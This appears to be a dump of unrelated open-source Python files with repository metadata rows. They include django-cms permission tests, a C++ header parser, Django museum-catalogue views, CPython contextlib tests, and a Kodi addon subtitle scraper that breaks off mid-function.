self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[0]).count())
# this will confirm explicit permissions still work, by adding the first
# site instance to the many2many relationship 'sites'
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False,
user=USERS[1]).sites.add(SITES[0])
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[1]).count())
homepage = create_page(title="master", template="nav_playground.html",
language="en", in_navigation=True, slug='/')
publish_page(page=homepage, user=superuser, language='en')
with self.settings(CMS_PERMISSION=True):
# for all users, they should have access to site 1
request = RequestFactory().get(path='/')
request.session = {'cms_admin_site': site_1.pk}
request.current_page = None
for user in USERS:
request.user = user
# Note, the query count is inflated by doing additional lookups
# because there's a site param in the request.
with self.assertNumQueries(FuzzyInt(3,4)):
# internally this calls PageAdmin.has_[add|change|delete]_permission()
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
# can't use the above loop for this test, as we're testing that
# user 1 has access, but user 2 does not, as they are only assigned
# to site 1
request = RequestFactory().get(path='/')
request.session = {'cms_admin_site': site_2.pk}
request.current_page = None
# Refresh internal user cache
USERS[0] = self.reload(USERS[0])
USERS[1] = self.reload(USERS[1])
# As before, the query count is inflated by doing additional lookups
# because there's a site param in the request
with self.assertNumQueries(FuzzyInt(5, 15)):
# this user shouldn't have access to site 2
request.user = USERS[1]
self.assertEqual({'add': False, 'change': False, 'delete': False},
site._registry[Page].get_model_perms(request))
# but, going back to the first user, they should.
request = RequestFactory().get('/', data={'site__exact': site_2.pk})
request.user = USERS[0]
request.current_page = None
request.session = {}
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
def test_has_page_add_permission_with_target(self):
page = create_page('Test', 'nav_playground.html', 'en')
user = self._create_user('user')
request = RequestFactory().get('/', data={'target': page.pk})
request.session = {}
request.user = user
has_perm = site._registry[Page].has_add_permission(request)
self.assertFalse(has_perm)
|
czpython/django-cms
|
cms/tests/test_permmod.py
|
Python
|
bsd-3-clause
| 44,347 | 0.001804 |
import re
import numpy as np
def identify_templates(hfile):
"""
Parameters
----------
hfile : string
.h header file to be parsed
Returns
-------
tdict : dictionary
dictionary of lists
each dictionary is a function
each list identifies the arglist
Notes
-----
The header looks for
template <class I, class T>
void myfunc(const I n, const T a, const T * x, T * y){
...
}
rules:
- 'template' identifies the start of a templated function
- the argument list is limited to
- I: int array
- T: data array
- if *, then pointer type
else, scalar
- multiples of the same type look like I1, I2, ...
- in addition 'const' and 'void'
- in addition operators of the form OP&
- then it makes i, I, t, T, depending on type
"""
types = ['i', 'I', 't', 'T']
with open(hfile, 'rU') as hfid:
text = hfid.read()
temp_iter = re.finditer('template\s*\<', text)
temp_start = [m.start(0) for m in temp_iter]
docst_iter = re.finditer(r'//\s*begin{docstring}', text)
docst_start = [m.start(0) for m in docst_iter]
docst_iter = re.finditer(r'//\s*end{docstring}', text)
docst_end = [m.start(0) for m in docst_iter]
# check begin and end docstrings
if len(docst_start) != len(docst_end):
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
# each docstring is associated with some template
# each template is not associated with some docstring
# associate the templates with docstring if possible (from docstrong POV)
temp_start = np.array(temp_start)
docst = ['' for t in range(len(temp_start))]
cppcomment = re.compile('^//')
for ms, me in zip(docst_start, docst_end):
if ms >= me:
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
docid = np.where(ms < temp_start)[0][0]
docstring = text[ms:me].splitlines()
pdocstring = []
for d in docstring[1:]: # not the first line
pdocstring.append(cppcomment.sub('', d))
docst[docid] = '\n'.join(pdocstring)
classre = re.compile('template.*<(.+?)>')
funcre = re.compile('template\s*<.*?>(.+?){', re.DOTALL)
argsre = re.compile('(.+?)\s+(.+?)\s*\((.*?)\)', re.DOTALL)
tidre = re.compile('([%s])' % ''.join(types) + '([0-9]+)')
funcs = []
print('[identify_templates] ...parsing %s' % hfile)
k = 0
for tstart in temp_start:
# class list
classes = classre.search(text, tstart).group(1).strip()
# function call
funccall = funcre.search(text, tstart).group(1).strip()
# check classes
classes = re.sub('class', '', classes)
classes = re.sub('typename', '', classes)
classes = re.sub('\s', '', classes).split(',')
for tid in classes:
if len(tid) == 1:
thistype = tid
else:
m = tidre.match(tid)
thistype = m.group(1).strip()
thisnum = m.group(2).strip()
del thisnum
if thistype not in types:
raise ValueError('class type \'%s\' not supported' % thistype +
' in your header file %s' % hfile)
# get the function declaration
m = argsre.match(funccall)
funcret = m.group(1).strip()
funcname = m.group(2).strip()
funcargs = m.group(3).strip()
args = funcargs.split(',')
# mark args, const, type
if len(args[0]) == 0:
args = []
const = []
atype = []
for arg in args:
if 'const ' in arg:
const.append(True)
else:
const.append(False)
arg = arg.replace('const', '').strip()
if ('*' in arg) or ('[]' in arg):
atype.append(arg[0].upper())
else:
atype.append(arg[0].lower())
if funcret == 'void':
spec = 'v'
else:
spec = funcret
for c, t in zip(const, atype):
if c:
spec += t
else:
spec += '*' + t
funcs.append({'func': funcname, 'const': const, 'atype': atype,
'ret': funcret, 'spec': spec,
'docstring': docst[k]})
print('\t...found %s(...)' % funcname)
k += 1
return funcs
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
import os
temps = os.listdir('./templates')
example_templates = [h for h in temps
if (h.startswith('example') and h.endswith('.h'))]
example_templates = ['example.h']
funcs = identify_templates(example_templates, './templates/')
else:
f = sys.argv[1]
funcs = identify_templates(f)
for func in funcs:
print(func['func'])
print(' %s' % func['spec'])
|
lukeolson/crappy
|
utils.py
|
Python
|
bsd-3-clause
| 5,160 | 0.00155 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0010_product_design_format'),
]
operations = [
migrations.AlterField(
model_name='product',
name='design',
field=models.TextField(null=True, blank=True),
),
]
|
GETLIMS/LIMS-Backend
|
lims/projects/migrations/0011_auto_20160822_1527.py
|
Python
|
mit
| 415 | 0 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import datetime
import os
from . import core
from .metadata import __version__, version_formatter
time_string = datetime.datetime.now().strftime('%A, %d %B %Y %I:%M%p')
pid = os.getpid()
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def print_header():
driver_info = version_formatter("""{version} {release}""")
git_info = version_formatter("""{{{branch}}} {githash} {clean}""")
datadir = core.get_environment("PSIDATADIR")
memory = sizeof_fmt(core.get_memory())
threads = str(core.get_num_threads())
header = """
-----------------------------------------------------------------------
Psi4: An Open-Source Ab Initio Electronic Structure Package
Psi4 %s
Git: Rev %s
R. M. Parrish, L. A. Burns, D. G. A. Smith, A. C. Simmonett,
A. E. DePrince III, E. G. Hohenstein, U. Bozkaya, A. Yu. Sokolov,
R. Di Remigio, R. M. Richard, J. F. Gonthier, A. M. James,
H. R. McAlexander, A. Kumar, M. Saitow, X. Wang, B. P. Pritchard,
P. Verma, H. F. Schaefer III, K. Patkowski, R. A. King, E. F. Valeev,
F. A. Evangelista, J. M. Turney, T. D. Crawford, and C. D. Sherrill,
submitted.
-----------------------------------------------------------------------
Psi4 started on: %s
Process ID: %6d
PSIDATADIR: %s
Memory: %s
Threads: %s
""" % (driver_info, git_info, time_string, pid, datadir, memory, threads)
core.print_out(header)
|
kratman/psi4public
|
psi4/header.py
|
Python
|
gpl-2.0
| 2,628 | 0.003425 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from dateutil import relativedelta
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect
from django.db.models import Q, Count
from django_tables2 import RequestConfig
from osnovni.forms import PredmetForm, PredmetSearchForm
from osnovni.models import *
from osnovni.tables import *
@login_required
def index(request):
return render(request, 'osnovni/index.html')
@login_required
def novi_predmet(request):
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
else:
form = PredmetForm(initial={'kreirao': request.user.radnik, 'datum_kreiranja': datetime.date.today()})
context = {'form': form,
'pagetitle': u'Novi karton',
'maintitle': u'Novi karton',
'titleinfo': u'Kreiranje novog kartona',
'form_mode': 'new'}
return render(request, 'osnovni/predmet.html', context)
@login_required
def predmet(request, predmet_id):
try:
pred = MuzejskiPredmet.objects.get(pk=predmet_id)
except MuzejskiPredmet.DoesNotExist:
return redirect('index')
template = 'osnovni/predmet.html'
context = {}
context['pagetitle'] = u'Pregled kartona'
context['maintitle'] = u'Pregled kartona'
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
context['form_mode'] = 'edit'
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES, instance=pred)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
else:
form = PredmetForm(instance=pred)
if request.user.radnik.uloga.id > 2:
context['predmet'] = pred
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
template = 'osnovni/predmet_view.html'
istorija = IstorijaIzmenaPredmeta.objects.filter(predmet=pred).order_by('timestamp')
table = PredmetHistoryList(istorija)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context['form'] = form
context['table'] = table
return render(request, template, context)
@login_required
def pretraga(request):
if request.method == 'POST':
form = PredmetSearchForm(request.POST)
if form.is_valid():
query = None
query_desc = ''
inv_br = form.cleaned_data['inv_br']
if inv_br is not None and inv_br != '':
q = Q(inv_broj=inv_br)
query = query & q if query is not None else q
query_desc += ' inv.br:' + str(inv_br)
vrsta_predmeta = form.cleaned_data['vrsta_predmeta']
if vrsta_predmeta is not None and vrsta_predmeta != '':
q = Q(vrsta_predmeta__icontains=vrsta_predmeta)
query = query & q if query is not None else q
query_desc += ' predmet:' + vrsta_predmeta
vrsta_zbirke = form.cleaned_data['vrsta_zbirke']
if vrsta_zbirke is not None:
q = Q(vrsta_zbirke_id=vrsta_zbirke.id)
query = query & q if query is not None else q
query_desc += ' zbirka:' + vrsta_zbirke.naziv
vreme_nastanka = form.cleaned_data['vreme_nastanka']
if vreme_nastanka is not None and vreme_nastanka != '':
q = Q(vreme_nastanka__icontains=vreme_nastanka)
query = query & q if query is not None else q
query_desc += ' vreme:' + vreme_nastanka
datum_nastanka1 = form.cleaned_data['datum_nastanka1']
if datum_nastanka1 is not None:
q = Q(datum_nastanka__gte=datum_nastanka1)
query = query & q if query is not None else q
query_desc += ' od:' + datetime.date.strftime(datum_nastanka1, '%d.%m.%Y.')
datum_nastanka2 = form.cleaned_data['datum_nastanka2']
if datum_nastanka2 is not None:
q = Q(datum_nastanka__lte=datum_nastanka2)
query = query & q if query is not None else q
query_desc += ' do:' + datetime.date.strftime(datum_nastanka2, '%d.%m.%Y.')
mesto_nastanka = form.cleaned_data['mesto_nastanka']
if mesto_nastanka is not None:
q = Q(mesto_nastanka2=mesto_nastanka)
query = query & q if query is not None else q
query_desc += ' mesto:' + mesto_nastanka.naziv
autor = form.cleaned_data['autor']
if autor is not None and autor != '':
q = Q(autor__icontains=autor)
query = query & q if query is not None else q
query_desc += ' autor:' + autor
opis = form.cleaned_data['opis']
if opis is not None and opis != '':
q = Q(opis__icontains=opis)
query = query & q if query is not None else q
query_desc += ' opis:' + opis
kategorija = form.cleaned_data['kategorija']
if kategorija is not None:
q = Q(kategorija=kategorija)
query = query & q if query is not None else q
query_desc += ' kat:' + kategorija.naziv
obradio = form.cleaned_data['obradio']
if obradio is not None and obradio != '':
q = Q(obradio__icontains=obradio)
query = query & q if query is not None else q
query_desc += ' obradio:' + obradio
uneo = form.cleaned_data['uneo']
if uneo is not None:
q = Q(kreirao=uneo)
query = query & q if query is not None else q
query_desc += ' uneo:' + uneo.puno_ime()
datum_unosa1 = form.cleaned_data['datum_unosa1']
if datum_unosa1 is not None:
q = Q(datum_kreiranja__gte=datum_unosa1)
query = query & q if query is not None else q
query_desc += ' unos_od:' + datetime.date.strftime(datum_unosa1, '%d.%m.%Y.')
datum_unosa2 = form.cleaned_data['datum_unosa2']
if datum_unosa2 is not None:
q = Q(datum_kreiranja__lte=datum_unosa2)
query = query & q if query is not None else q
query_desc += ' unos_do:' + datetime.date.strftime(datum_unosa2, '%d.%m.%Y.')
if query is None:
predmeti = MuzejskiPredmet.objects.all()
else:
predmeti = MuzejskiPredmet.objects.filter(query).distinct()
return _prikazi_predmete(request, predmeti, u'Pretraga kartona', u'Rezultati pretrage', query_desc)
else:
form = PredmetSearchForm()
context = {'form': form,
'pagetitle': u'Pretraga kartona',
'maintitle': u'Pretraga kartona',
'titleinfo': u'Unesite poznate podatke'}
return render(request, 'osnovni/pretraga.html', context)
@login_required
def moji_predmeti(request):
predmeti = MuzejskiPredmet.objects.filter(kreirao=request.user.radnik)
return _prikazi_predmete(request, predmeti, u'Moji kartoni', u'Moji kartoni', u'korisnika ' + request.user.username)
def _prikazi_predmete(request, predmeti, pagetitle, maintitle, titleinfo):
table = PredmetList(predmeti)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {'table': table,
'pagetitle': pagetitle,
'maintitle': maintitle,
'titleinfo': titleinfo}
return render(request, 'osnovni/predmet_list.html', context)
@login_required
def statistika_unosa(request):
danas = datetime.date.today()
minus6 = danas - relativedelta.relativedelta(months=6)
radnici = Radnik.objects.annotate(br_kartona=Count('muzejskipredmet')).\
filter(muzejskipredmet__datum_kreiranja__gte=minus6).\
filter(muzejskipredmet__datum_kreiranja__lte=danas)
table = RadniciList(radnici)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {
'table': table,
'pagetitle': u'Statistika unosa',
'maintitle': u'Statistika unosa',
'titleinfo': u'za period od ' + datetime.date.strftime(minus6, '%d.%m.%Y.') + u' do ' +
datetime.date.strftime(danas, '%d.%m.%Y.')
}
return render(request, 'osnovni/statistika_unosa.html', context)
@login_required
def inventarna_knjiga(request, od=1, do=1000000):
predmeti = MuzejskiPredmet.objects.filter(inv_broj__gte=od).filter(inv_broj__lte=do).order_by('inv_broj')
table = InvKnjiga(predmeti)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {'table': table, 'od': od, 'do': do, 'cela': (od == 1 and do == 1000000)}
return render(request, 'osnovni/inventarna_knjiga.html', context)
|
mbranko/kartonpmv
|
osnovni/views.py
|
Python
|
mit
| 9,507 | 0.001367 |
import copy
from wpm.filelist import *
f = filelist()
f.load("/home/kman/bin/wpm")
f.get_list()
p = copy.copy(f)
p.sort()
f.randomize()
p.get_list()
f.get_list()
p.close()
f.close()
|
cristicalin/setwall
|
junk/test_copy.py
|
Python
|
gpl-3.0
| 181 | 0.005525 |
from distutils.core import setup, Extension
setup (name = "win32ver",
version = "1.0",
maintainer = "Jeong Wook Oh",
maintainer_email = "oh.jeongwook@gmail.com",
description = "Win32 Version Information Retriever",
ext_modules = [ Extension('win32ver',
sources = ['win32ver.cpp'],
libraries = ['version'],
platforms='x86' ) ]
)
|
jenix21/DarunGrim
|
Src/Scripts/FileManagement/setup.py
|
Python
|
bsd-3-clause
| 361 | 0.108033 |
"""Unit tests for contextlib.py, and other context managers."""
import sys
import tempfile
import unittest
from contextlib import * # Tests __all__
from test import support
try:
import threading
except ImportError:
threading = None
class ContextManagerTestCase(unittest.TestCase):
def test_contextmanager_plain(self):
state = []
@contextmanager
def woohoo():
state.append(1)
yield 42
state.append(999)
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_finally(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
finally:
state.append(999)
with self.assertRaises(ZeroDivisionError):
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError()
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_no_reraise(self):
@contextmanager
def whee():
yield
ctx = whee()
ctx.__enter__()
# Calling __exit__ should not result in an exception
self.assertFalse(ctx.__exit__(TypeError, TypeError("foo"), None))
def test_contextmanager_trap_yield_after_throw(self):
@contextmanager
def whoo():
try:
yield
except:
yield
ctx = whoo()
ctx.__enter__()
self.assertRaises(
RuntimeError, ctx.__exit__, TypeError, TypeError("foo"), None
)
def test_contextmanager_except(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
except ZeroDivisionError as e:
state.append(e.args[0])
self.assertEqual(state, [1, 42, 999])
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError(999)
self.assertEqual(state, [1, 42, 999])
def _create_contextmanager_attribs(self):
def attribs(**kw):
def decorate(func):
for k,v in kw.items():
setattr(func,k,v)
return func
return decorate
@contextmanager
@attribs(foo='bar')
def baz(spam):
"""Whee!"""
return baz
def test_contextmanager_attribs(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__name__,'baz')
self.assertEqual(baz.foo, 'bar')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_contextmanager_doc_attrib(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__doc__, "Whee!")
class ClosingTestCase(unittest.TestCase):
# XXX This needs more work
def test_closing(self):
state = []
class C:
def close(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with closing(x) as y:
self.assertEqual(x, y)
self.assertEqual(state, [1])
def test_closing_error(self):
state = []
class C:
def close(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with self.assertRaises(ZeroDivisionError):
with closing(x) as y:
self.assertEqual(x, y)
1 / 0
self.assertEqual(state, [1])
class FileContextTestCase(unittest.TestCase):
def testWithOpen(self):
tfn = tempfile.mktemp()
try:
f = None
with open(tfn, "w") as f:
self.assertFalse(f.closed)
f.write("Booh\n")
self.assertTrue(f.closed)
f = None
with self.assertRaises(ZeroDivisionError):
with open(tfn, "r") as f:
self.assertFalse(f.closed)
self.assertEqual(f.read(), "Booh\n")
1 / 0
self.assertTrue(f.closed)
finally:
support.unlink(tfn)
@unittest.skipUnless(threading, 'Threading required for this test.')
class LockContextTestCase(unittest.TestCase):
def boilerPlate(self, lock, locked):
self.assertFalse(locked())
with lock:
self.assertTrue(locked())
self.assertFalse(locked())
with self.assertRaises(ZeroDivisionError):
with lock:
self.assertTrue(locked())
1 / 0
self.assertFalse(locked())
def testWithLock(self):
lock = threading.Lock()
self.boilerPlate(lock, lock.locked)
def testWithRLock(self):
lock = threading.RLock()
self.boilerPlate(lock, lock._is_owned)
def testWithCondition(self):
lock = threading.Condition()
def locked():
return lock._is_owned()
self.boilerPlate(lock, locked)
def testWithSemaphore(self):
lock = threading.Semaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
def testWithBoundedSemaphore(self):
lock = threading.BoundedSemaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
class mycontext(ContextDecorator):
started = False
exc = None
catch = False
def __enter__(self):
self.started = True
return self
def __exit__(self, *exc):
self.exc = exc
return self.catch
class TestContextDecorator(unittest.TestCase):
def test_contextdecorator(self):
context = mycontext()
with context as result:
self.assertIs(result, context)
self.assertTrue(context.started)
self.assertEqual(context.exc, (None, None, None))
def test_contextdecorator_with_exception(self):
context = mycontext()
with self.assertRaisesRegex(NameError, 'foo'):
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
context = mycontext()
context.catch = True
with context:
raise NameError('foo')
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorator(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
test()
self.assertEqual(context.exc, (None, None, None))
def test_decorator_with_exception(self):
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
raise NameError('foo')
with self.assertRaisesRegex(NameError, 'foo'):
test()
self.assertIsNotNone(context.exc)
self.assertIs(context.exc[0], NameError)
def test_decorating_method(self):
context = mycontext()
class Test(object):
@context
def method(self, a, b, c=None):
self.a = a
self.b = b
self.c = c
# these tests are for argument passing when used as a decorator
test = Test()
test.method(1, 2)
self.assertEqual(test.a, 1)
self.assertEqual(test.b, 2)
self.assertEqual(test.c, None)
test = Test()
test.method('a', 'b', 'c')
self.assertEqual(test.a, 'a')
self.assertEqual(test.b, 'b')
self.assertEqual(test.c, 'c')
test = Test()
test.method(a=1, b=2)
self.assertEqual(test.a, 1)
self.assertEqual(test.b, 2)
def test_typo_enter(self):
class mycontext(ContextDecorator):
def __unter__(self):
pass
def __exit__(self, *exc):
pass
with self.assertRaises(AttributeError):
with mycontext():
pass
def test_typo_exit(self):
class mycontext(ContextDecorator):
def __enter__(self):
pass
def __uxit__(self, *exc):
pass
with self.assertRaises(AttributeError):
with mycontext():
pass
def test_contextdecorator_as_mixin(self):
class somecontext(object):
started = False
exc = None
def __enter__(self):
self.started = True
return self
def __exit__(self, *exc):
self.exc = exc
class mycontext(somecontext, ContextDecorator):
pass
context = mycontext()
@context
def test():
self.assertIsNone(context.exc)
self.assertTrue(context.started)
test()
self.assertEqual(context.exc, (None, None, None))
def test_contextmanager_as_decorator(self):
state = []
@contextmanager
def woohoo(y):
state.append(y)
yield
state.append(999)
@woohoo(1)
def test(x):
self.assertEqual(state, [1])
state.append(x)
test('something')
self.assertEqual(state, [1, 'something', 999])
# This is needed to make the test actually run under regrtest.py!
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-3.2/Lib/test/test_contextlib.py
|
Python
|
mit
| 10,109 | 0.002968 |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from django.core.management.base import BaseCommand
from desktop.lib.connectors.models import _get_installed_connectors
from beeswax.management.commands.beeswax_install_examples import Command as EditorCommand
from useradmin.models import User
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
args = '<user>'
help = 'Install examples but do not overwrite them.'
def add_arguments(self, parser):
parser.add_argument(
'--username',
dest='username',
default='hue',
help='Hue username used to execute the command',
)
parser.add_argument(
'--dialect',
dest='dialect',
default=None,
help='Dialect name we want to install the samples, all if not specified',
)
def handle(self, *args, **options):
LOG.info('Installing %s examples as %s' % (options.get('dialect') or 'all', options['username']))
user = User.objects.get(username=options['username'])
dialect = options.get('dialect')
dialects = [
{
'id': connector['id'],
'dialect': connector['dialect']
}
for connector in _get_installed_connectors(category='editor')
if dialect is None or connector['dialect'] == dialect
]
tables = None
for dialect in dialects:
EditorCommand().handle(
app_name=dialect['dialect'], # Unused?
user=user,
tables=tables,
dialect=dialect['dialect'],
interpreter={'type': dialect['id']}
)
|
cloudera/hue
|
desktop/libs/notebook/src/notebook/management/commands/samples_setup.py
|
Python
|
apache-2.0
| 2,309 | 0.003465 |
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import time
import urllib2
import re
import HTMLParser
import socket
import xbmcvfs
import log_utils
import kodi
from constants import VIDEO_TYPES
from constants import SRT_SOURCE
from constants import USER_AGENT
from db_utils import DB_Connection
MAX_RETRIES = 2
TEMP_ERRORS = [500, 502, 503, 504]
BASE_URL = 'http://www.addic7ed.com'
class SRT_Scraper():
def __init__(self):
self.db_connection = DB_Connection()
def get_tvshow_id(self, title, year=None):
match_title = title.lower()
rows = self.db_connection.get_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE)
if rows:
tvshow_id = rows[0][0]
log_utils.log('Returning local tvshow id: |%s|%s|%s|' % (title, year, tvshow_id), log_utils.LOGDEBUG)
return tvshow_id
html = self.__get_cached_url(BASE_URL, 24)
regex = re.compile('option\s+value="(\d+)"\s*>(.*?)</option')
site_matches = []
for item in regex.finditer(html):
tvshow_id, site_title = item.groups()
# strip year off title and assign it to year if it exists
r = re.search('(\s*\((\d{4})\))$', site_title)
if r:
site_title = site_title.replace(r.group(1), '')
site_year = r.group(2)
else:
site_year = None
# print 'show: |%s|%s|%s|' % (tvshow_id, site_title, site_year)
if match_title == site_title.lower():
if year is None or year == site_year:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, tvshow_id)
return tvshow_id
site_matches.append((tvshow_id, site_title, site_year))
if not site_matches:
return None
elif len(site_matches) == 1:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, site_matches[0][0])
return site_matches[0][0]
else:
# there were multiple title matches and year was passed but no exact year matches found
for match in site_matches:
# return the match that has no year specified
if match[2] is None:
self.db_connection.set_related_url(VIDEO_TYPES.TVSHOW, title, year, SRT_SOURCE, match[0])
return match[0]
def get_season_subtitles(self, language, tvshow_id, season):
url = BASE_URL + '/ajax_loadShow.php?show=%s&season=%s&langs=&hd=%s&hi=%s' % (tvshow_id, season, 0, 0)
html = self.__get_cached_url(url, .25)
# print html.decode('ascii', 'ignore')
req_hi = kodi.get_setting('subtitle-hi') == 'true'
req_hd = kodi.get_setting('subtitle-hd') == 'true'
items = []
regex = re.compile('<td>(\d+)</td><td>(\d+)</td><td>.*?</td><td>(.*?)</td><td.*?>(.*?)</td>.*?<td.*?>(.+?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?><a\s+href="(.*?)">.+?</td>',
re.DOTALL)
for match in regex.finditer(html):
season, episode, srt_lang, version, completed, hi, corrected, hd, srt_url = match.groups()
if not language or language == srt_lang and (not req_hi or hi) and (not req_hd or hd):
item = {}
item['season'] = season
item['episode'] = episode
item['language'] = srt_lang
item['version'] = version
if completed.lower() == 'completed':
item['completed'] = True
item['percent'] = '100'
else:
item['completed'] = False
r = re.search('([\d.]+)%', completed)
if r:
item['percent'] = r.group(1)
else:
item['percent'] = '0'
item['hi'] = True if hi else False
item['corrected'] = True if corrected else False
item['hd'] = True if hd else False
item['url'] = srt_url
items.append(item)
return items
def get_episode_subtitles(self, language, tvshow_id, season, episode):
subtitles = self.get_season_subtitles(language, tvshow_id, season)
items = []
for subtitle in subtitles:
if subtitle['episode'] == str(episode):
items.append(subtitle)
return items
def download_subtitle(self, url):
url = BASE_URL + url
(response, srt) = self.__get_url(url)
if not hasattr(response, 'info') or 'Content-Disposition' not in response.info():
return
cd = response.info()['Content-Disposition']
r = re.search('filename="(.*)"', cd)
if r:
filename = r.group(1)
else:
filename = 'addic7ed_subtitle.srt'
filename = re.sub('[^\x00-\x7F]', '', filename)
final_path = os.path.join(kodi.get_setting('subtitle-folder'), filename)
final_path = kodi.translate_path(final_path)
if not xbmcvfs.exists(os.path.dirname(final_path)):
try:
try: xbmcvfs.mkdirs(os.path.dirname(final_path))
except: os.mkdir(os.path.dirname(final_path))
except:
log_utils.log('Failed to create directory %s' % os.path.dirname(final_path), log_utils.LOGERROR)
raise
with open(final_path, 'w') as f:
f.write(srt)
return final_path
def __get_url(self, url):
try:
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
response = urllib2.urlopen(req, timeout=10)
body = response.read()
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ('', '')
return (response, body)
def __get_cached_url(self, url, cache=8):
log_utils.log('Fetching Cached URL: %s' % url, log_utils.LOGDEBUG)
before = time.time()
_created, _res_header, html = self.db_connection.get_cached_url(url, cache_limit=cache)
if html:
log_utils.log('Returning cached result for: %s' % (url), log_utils.LOGDEBUG)
return html
log_utils.log('No cached url found for: %s' % url, log_utils.LOGDEBUG)
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
